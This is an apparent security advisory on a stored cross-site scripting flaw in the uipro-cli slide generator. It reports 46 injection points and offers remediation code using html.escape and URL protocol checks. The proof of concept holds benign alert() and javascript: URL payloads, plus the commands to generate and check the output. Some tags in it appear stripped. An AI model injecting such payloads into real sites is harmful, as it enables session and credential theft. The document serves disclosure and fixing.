Stored XSS in UI/UX Pro Max Skill (uipro-cli) via JSON Input

# Slide Generator Multiple Stored XSS Vulnerability Summary ## Vulnerability Overview * **Vulnerability Name**: Slide Generator Multiple Stored XSS (46 Injection Points) * **Vulnerability ID**: #247 * **Vulnerability Type**: Stored Cross-Site Scripting (CWE-79) * **Severity**: High (CVSS 3.1 Score: 8.1) * **Affected Product**: UI/UX Pro Max Skill (uipro-cli) * **Affected Versions**: v2.5.0 and earlier * **Root Cause**: When generating HTML slides, user-controlled JSON data is directly embedded into HTML output using Python f-strings without any HTML entity encoding. ## Impact Scope * **Injection Points**: 46 unique data injection points. * **Attack Vector**: Network — attackers can distribute malicious JSON via repositories, URLs, or AI prompts. * **Attack Complexity**: Low — simple JSON input can trigger the vulnerability. * **Privileges Required**: None — anyone can create JSON. * **User Interaction**: Required — victims must open the generated HTML file in a browser. * **Specific Impacts**: * **Cookie Theft**: Execute malicious code via `` tags. * **Session Hijacking**: Steal authentication tokens from same-origin applications. * **Phishing Attacks**: Use `` overlays to mimic login pages. * **Keylogging**: Inject event listeners to capture all keystrokes. * **Credential Theft**: Replace slide content with fake login forms. * **Worm Propagation**: If shared via internal tools, XSS will spread to all viewers. ## Remediation 1. **HTML Encoding**: Before embedding user data, apply HTML entity encoding to all data using `html.escape`. 2. **URL Validation**: For URLs in `href` attributes, validate the protocol (only allow `http://`, `https://`, `#`, `/`) and encode the URL. ## POC Code ### 1. Malicious JSON Input (Step 1: Create Malicious JSON Input) ```json { "title": "Test", "slides": [ { "type": "title", "title": "alert('XSS')", "badge": "", "company": "Test" }, { "type": "cta", "headline": "Click", "cta": "Start", "cta_url": "javascript:alert(document.domain)", "contact": "x", "website": "x" } ] } ``` ### 2. Generation Command (Step 2: Generate HTML) ```bash python3 generate-slide.py --json payload.json --output xss-output.html ``` ### 3. Verify Injection (Step 3: Verify Injection) ```bash $ grep -c "" xss-output.html 1 $ grep -c "onerror" xss-output.html 1 $ grep -c "javascript:" xss-output.html 1 ``` ### 4. Generated HTML Contains Unescaped Content (Generated HTML Contains (unescaped)) ```html alert('XSS') Start ``` ### 5. Reproduction Result (Reproduction Result) ```bash $ python3 generate-slide.py --json payload.json --output output.html Deck generated: output.html $ grep "" output.html alert('XSS') $ grep "javascript:" output.html Start Opening output.html in browser triggers JavaScript execution. ``` ### 6. Remediation Code Example (Remediation) **Fix HTML Encoding:** ```python from html import escape def generate_title_slide(data): return f''' {escape(str(data.get('badge', 'Pitch Deck')))} {escape(str(data.get('title', 'Title')))} ... ''' ``` **Fix href Injection:** ```python def safe_url(url, default='x'): if url and url.strip().lower().startswith(('http://', 'https://', '#', '/')): return escape(url, quote=True) return default ```

Goal Reached Thanks to every supporter — we hit 100%!

Stored XSS in UI/UX Pro Max Skill (uipro-cli) via JSON Input

More from this source